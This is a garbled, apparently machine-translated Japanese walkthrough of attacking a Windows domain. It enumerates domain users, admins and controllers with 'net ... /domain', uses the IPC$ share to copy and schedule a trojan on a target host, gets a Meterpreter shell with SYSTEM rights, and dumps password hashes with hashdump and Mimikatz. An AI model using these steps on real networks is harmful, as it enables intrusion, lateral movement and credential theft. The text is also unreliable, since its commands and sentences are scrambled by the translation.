運転指令に関連するドメイン
1.ユーザードメインをチェック
/ドメインユーザーNET
のいくつかのフィールドに2.アクセス
ビューNET /ドメイン
3.チェックホストドメイン
ビューNET /ドメイン:XXX
4.ビューグループ内のフィールド
グループNET /ドメイン
5.すべてのホストドメイン名を参照してください。
グループNET「ドメインコンピュータ」/ドメイン
6.チェックドメイン管理者
グループNET「ドメイン管理者」/ドメイン
7.ドメインコントローラが参照してください。
グループNET「ドメインコントローラ」/ドメイン
8.ビュー管理グループ
グループNET「エンタープライズ管理者」/ドメイン
9.サーバー表示時間
nettime /ドメイン
2、侵略IPC $
IPC $侵略を共有し、デフォルトでIPC $の侵入は、ネットワークと共通含め、Windowsシステムを使用してコンピュータの制御を取得するために始めました。
IPC $のホストがあることを今仮定:127.0.0.25、次のコマンドを入力します。
#接続127.0.0.25 IPC $共有:
D:IPC $ \ 127.0.0.25 \> NET用
ターゲットホストへ#コピーsrv.exe
D:>コピーsrv.exe 127.0.0.25 \ IPC $ \
#チェックタイム
D:>時間NET \ 127.0.0.25
srv.exeで10時50分で、#useコマンドを開始する(設定時間は、ホスト時間よりも高速であることに注意してください)
D:> \ 127.0.0.25 10:50 srv.exeの
コマンドがである上コンピュータに聞かせて物事が(例えば、プログラムを実行している)指定した時刻にコマンドを指定しません
ここでは、サーバーにアップロードされたペイロードPAVMSEP131を殺す避けるために、その後、ペイロードを開始Meterpreterシェル立ち直るためにコマンドで使用し
、ターゲット・サーバーにコピーされたトロイの木馬を
システム時刻を確認します
トロイの木馬を起動するコマンドで使用します
そして、あなたは集会の成功を見ることができ、ハンドラモニターを返す、我々はPAVMSEP131サーバMeterpreterシェル得
ラリーの成功を
以下の情報PAVMSEP131サーバーを見て、今の許可
システム情報を表示します
Mimikatz他のツールを使用するかを示す、SYSTEM権限を見ることができ、あなたも実行入力できポスト/窓/収集/ hashdumpハッシュが来
注意することがMimikatzポイントでハッシュを把握する前に:に、あなたは、64ビットサーバーオペレーティングシステムをインストールしている場合平文パスワード64ビットのオペレーティングシステムを表示するために、64ビットのプログラム処理に移行するMimikatzプロセスは、32ビットシステムでは、この制限を持っていません。
本明細書において使用されるMimikatzキャッチハッシュとして
アップロードMimikatz
ハッシュクロール
キャッチドメインユーザー権限を確認